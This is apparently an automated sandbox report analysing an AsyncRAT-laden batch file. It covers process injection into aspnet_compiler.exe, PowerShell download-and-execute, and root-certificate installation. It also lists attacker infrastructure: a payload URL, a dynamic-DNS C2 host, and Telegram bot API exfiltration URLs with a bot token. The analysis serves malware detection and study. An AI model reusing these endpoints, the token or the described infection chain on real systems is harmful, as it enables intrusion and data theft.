                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Yara detected AsyncRAT
                      Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25702485170.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701854fd0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.257018be6f0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.powershell.exe.25701870610.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000015.00000002.3894017282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025702269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.0000025701869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6676, type: MEMORYSTR
                      Source: powershell.exe, 00000004.00000002.2026750928.000002E7E2FEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :Thu, 05 Oct 2023 08:05:20 GMTr\MsMpeng.exe
                      Source: powershell.exe, 00000004.00000002.2022032808.000002E7E2DF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2033951833.000002E7E3091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information112
                      Scripting                      		Valid Accounts21
                      Windows Management Instrumentation                      		112
                      Scripting                      		1
                      DLL Side-Loading                      		11
                      Disable or Modify Tools                      		OS Credential Dumping1
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		1
                      DLL Side-Loading                      		211
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		LSASS Memory14
                      System Information Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		111
                      Obfuscated Files or Information                      		Security Account Manager131
                      Security Software Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive11
                      Encrypted Channel                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Registry Run Keys / Startup Folder                      		1
                      Install Root Certificate                      		NTDS1
                      Process Discovery                      		Distributed Component Object ModelInput Capture1
                      Non-Standard Port                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts41
                      PowerShell                      		Network Logon ScriptNetwork Logon Script2
                      Software Packing                      		LSA Secrets41
                      Virtualization/Sandbox Evasion                      		SSHKeylogging3
                      Non-Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Application Window Discovery                      		VNCGUI Input Capture114
                      Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      System Network Configuration Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Modify Registry                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt41
                      Virtualization/Sandbox Evasion                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562421 Sample: Pe4905VGl1.bat Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 51 api.telegram.org 2->51 53 ducksex.ddnsfree.com 2->53 55 5 other IPs or domains 2->55 67 Found malware configuration 2->67 69 Malicious sample detected (through community Yara rule) 2->69 71 Sigma detected: Powershell Download and Execute IEX 2->71 75 12 other signatures 2->75 12 cmd.exe 1 2->12         started        signatures3 73 Uses the Telegram API (likely for C&C communication) 51->73 process4 signatures5 97 Suspicious powershell command line found 12->97 99 Wscript starts Powershell (via cmd or directly) 12->99 101 Bypasses PowerShell execution policy 12->101 103 PowerShell case anomaly found 12->103 15 cmd.exe 1 12->15         started        18 conhost.exe 12->18         started        process6 signatures7 105 Suspicious powershell command line found 15->105 107 Wscript starts Powershell (via cmd or directly) 15->107 109 PowerShell case anomaly found 15->109 20 powershell.exe 17 27 15->20         started        process8 dnsIp9 57 almamas.com.ly 168.119.208.219, 443, 49705 HETZNER-ASDE Germany 20->57 59 api.telegram.org 149.154.167.220, 443, 49710, 49711 TELEGRAMRU United Kingdom 20->59 61 ipinfo.io 34.117.59.81, 443, 49709 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 20->61 47 C:\Users\Public\AXAGFIIEZBBS.bat, ASCII 20->47 dropped 49 C:\ProgramData\WindowsHost\MJMDVSAJFXR.vbs, ASCII 20->49 dropped 83 Creates an undocumented autostart registry key 20->83 85 Installs new ROOT certificates 20->85 87 Found suspicious powershell code related to unpacking or dynamic code loading 20->87 89 Loading BitLocker PowerShell Module 20->89 25 wscript.exe 1 20->25         started        28 taskkill.exe 1 20->28         started        30 taskkill.exe 1 20->30         started        32 8 other processes 20->32 file10 signatures11 process12 signatures13 91 Wscript starts Powershell (via cmd or directly) 25->91 93 Windows Scripting host queries suspicious COM object (likely to drop second stage) 25->93 95 Suspicious execution chain found 25->95 34 cmd.exe 1 25->34         started        process14 signatures15 65 Wscript starts Powershell (via cmd or directly) 34->65 37 powershell.exe 13 34->37         started        40 conhost.exe 34->40         started        process16 signatures17 77 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 37->77 79 Writes to foreign memory regions 37->79 81 Injects a PE file into a foreign processes 37->81 42 aspnet_compiler.exe 2 37->42         started        45 aspnet_compiler.exe 37->45         started        process18 dnsIp19 63 ducksex.ddnsfree.com 178.208.169.197, 49712, 49714, 49717 PHMGMT-AS1US Netherlands 42->63

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Pe4905VGl1.bat0%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://localhost:3030/Service.asmx0%Avira URL Cloudsafe
                      https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpg0%Avira URL Cloudsafe
                      https://ipinfo.i0%Avira URL Cloudsafe
                      ducksex.ddnsfree.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalse
                        		high
                        ipinfo.io
                        		34.117.59.81
                        		truefalse
                          		high
                          almamas.com.ly
                          		168.119.208.219
                          		truetrue
                            		unknown
                            ducksex.ddnsfree.com
                            		178.208.169.197
                            		truetrue
                              		unknown
                              api.telegram.org
                              		149.154.167.220
                              		truefalse
                                		high
                                fp2e7a.wpc.phicdn.net
                                		192.229.221.95
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendPhotofalse
                                    		high
                                    https://api.telegram.org/bot8168254885:AAGgICtfG4yYWGNfRJQuM0_XqdKd4ysvR5I/sendMessagefalse
                                      		high
                                      ducksex.ddnsfree.comtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://almamas.com.ly/wblwxiun.rtw/pnilrykd.jpgtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ipinfo.io/jsonfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://localhost:3030/Service.asmxpowershell.exe, 00000013.00000002.1753014941.00000257032C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025703E64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257028C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1825667488.000002576EEE0000.00000004.08000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ipinfo.io/missingauthpowershell.exe, 00000004.00000002.1868900966.000002E7CC446000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CB0A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.telegram.orgpowershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.org/botpowershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.microsoftpowershell.exe, 00000013.00000002.1823355430.000002576D0D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.telegram.org/bot$BotToken/sendPhotopowershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://go.micropowershell.exe, 00000004.00000002.1868900966.000002E7CC773000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.00000257013AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://ipinfo.iopowershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1868900966.000002E7CAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ipinfo.iopowershell.exe, 00000004.00000002.1868900966.000002E7CC286000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ipinfo.io/missXpowershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.telegram.org/bot$BotToken/sendMessagepowershell.exe, 00000004.00000002.1868900966.000002E7CB25A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/powershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1995041642.000002E7DAD3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://aka.ms/pscore68powershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://ipinfo.ipowershell.exe, 00000004.00000002.1868900966.000002E7CC454000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1868900966.000002E7CACD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1753014941.0000025700001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high

                                                                                World Map of Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public IPs

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                149.154.167.220
                                                                                		api.telegram.orgUnited Kingdom
                                                                                		62041TELEGRAMRUfalse
                                                                                34.117.59.81
                                                                                		ipinfo.ioUnited States
                                                                                		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                168.119.208.219
                                                                                		almamas.com.lyGermany
                                                                                		24940HETZNER-ASDEtrue
                                                                                178.208.169.197
                                                                                		ducksex.ddnsfree.comNetherlands
                                                                                		22363PHMGMT-AS1UStrue

                                                                                General Information

                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1562421
                                                                                Start date and time:2024-11-25 15:21:15 +01:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 8m 43s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:25
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:Pe4905VGl1.bat
                                                                                renamed because original name is a hash value
                                                                                Original Sample Name:5dee2d0dd4d3eee97c372b6a8dbd3d3042d24b9483addfa9f8786617a88e268b.bat
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.expl.evad.winBAT@38/13@5/4
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:
                                                                                • Successful, ratio: 94%
                                                                                • Number of executed functions: 26
                                                                                • Number of non-executed functions: 4
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .bat
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                Warnings

                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 199.232.214.172, 40.69.42.241, 192.229.221.95, 199.232.210.172
                                                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: Pe4905VGl1.bat

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                09:22:14API Interceptor111x Sleep call for process: powershell.exe modified
                                                                                09:23:21API Interceptor6862126x Sleep call for process: aspnet_compiler.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                149.154.167.220MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                  November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                        dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                              NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                  Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    34.117.59.81FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                    • ipinfo.io/ip
                                                                                                    build.exeGet hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/ip
                                                                                                    YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • ipinfo.io/json
                                                                                                    178.208.169.197N1f691bk5G.ps1Get hashmaliciousAsyncRATBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      ipinfo.ioEvjm8L1nEb.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 34.117.59.81
                                                                                                      mDHwap5GlV.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 34.117.59.81
                                                                                                      SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 34.117.59.81
                                                                                                      y.batGet hashmaliciousBraodoBrowse
                                                                                                      • 34.117.59.81
                                                                                                      https://fxwf9-53194.portmap.io:53194/?x=sb232111Get hashmaliciousUnknownBrowse
                                                                                                      • 34.117.59.81
                                                                                                      https://trimmer.to:443/GWHMYGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 34.117.59.81
                                                                                                      bose18mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                      • 34.117.59.81
                                                                                                      hnbose1711.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                      • 34.117.59.81
                                                                                                      LzmJLVB41K.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 34.117.59.81
                                                                                                      2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                      • 34.117.59.81
                                                                                                      bg.microsoft.map.fastly.netNew Purchase Order Document for PO1136908 000 SE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 199.232.210.172
                                                                                                      WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 199.232.214.172
                                                                                                      dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 199.232.210.172
                                                                                                      Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 199.232.214.172
                                                                                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 199.232.214.172
                                                                                                      http://propdfhub.comGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.210.172
                                                                                                      05.Unzipped.obfhotel22-11.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                      • 199.232.210.172
                                                                                                      412300061474#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 199.232.210.172
                                                                                                      somes.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 199.232.210.172
                                                                                                      docx008.docx.docGet hashmaliciousUnknownBrowse
                                                                                                      • 199.232.210.172

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUMSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 149.154.167.220
                                                                                                      November Quotation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      #U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 149.154.167.220
                                                                                                      dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 149.154.167.99
                                                                                                      order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGEvjm8L1nEb.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 34.117.59.81
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 34.116.198.130
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                      • 34.117.188.166
                                                                                                      HETZNER-ASDEhttp://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                                      • 5.161.110.190
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 49.13.32.95
                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                      • 49.13.32.95
                                                                                                      http://google.comGet hashmaliciousUnknownBrowse
                                                                                                      • 94.130.197.138
                                                                                                      rbCoIEGfDf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 91.107.151.211
                                                                                                      LWv5DuboZh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      • 91.107.151.211
                                                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 88.198.8.150
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      • 144.79.19.125
                                                                                                      powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
